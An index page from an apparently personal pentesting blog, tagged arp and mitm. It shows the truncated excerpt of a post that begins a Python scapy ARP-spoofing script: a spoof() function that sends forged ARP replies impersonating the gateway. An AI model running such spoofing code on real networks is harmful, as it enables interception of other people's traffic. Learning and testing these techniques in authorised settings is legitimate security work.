<!doctype html>
<html>
<head>
    <base href="/">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta name="author" content="jelle">

<meta name="description" content="">

<title>Arp</title>
<meta name="generator" content="Hugo 0.40.1" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.1.0/styles/pojoaque.min.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.1.0/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>

<link href="https://fonts.googleapis.com/css?family=Source+Code+Pro:400,700" rel="stylesheet" type="text/css">
<link  href="https://jwever.bitbucket.io/css/theme.min.css" rel="stylesheet" type="text/css">

</head>
<body>
<div class="page-container container-fluid">
<div class="col-md-3 menu">
    <nav class="col-md-3">
    
    <h3 class="home-link"><a href="/">Root</a></h3>
    <div id="last-posts" class="open">
        <h3 data-open="last-posts">Main - Most recent posts</h3>
        <ul>
            
            <li><a href="https://jwever.bitbucket.io/post/pentesting/">Pentesting</a></li>
            
        </ul>
    </div>
    

    
    <div id="tags" class="open">
        <h3 data-open="tags">Tags</h3>
        <ul class="tags">
            
            <li><a href="/tags/arp">arp</a></li>
            
            <li><a href="/tags/mitm">mitm</a></li>
            
        </ul>
    </div>
    

    
    <div id="categories" class="open">
        <h3 data-open="categories">Categories</h3>
        <ul class="categories">
            
            <li><a href="/categories/network-hacking">network-hacking</a></li>
            
            <li><a href="/categories/web-application-hacking">web-application-hacking</a></li>
            
        </ul>
    </div>
    
</nav>

</div>
<div class="col-md-9 content">


<div class="articles-list">
    
    <article>
        <h3><a href="https://jwever.bitbucket.io/post/pentesting/">Pentesting</a> - 2019-01-01 00:00:00</h3>
         Introduction Great
Basic Syntax  #!/usr/bin/env python import scapy.all as scapy import time import sys def spoof(target_ip, gw_ip): target_mac = get_mac(target_ip) packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gw_ip) scapy.send(packet, verbose=False)  
    </article>
    
</div>


</div>
</div>
<script src="https://jwever.bitbucket.io/js/theme.min.js" type="text/javascript"></script>


</body>
</html>

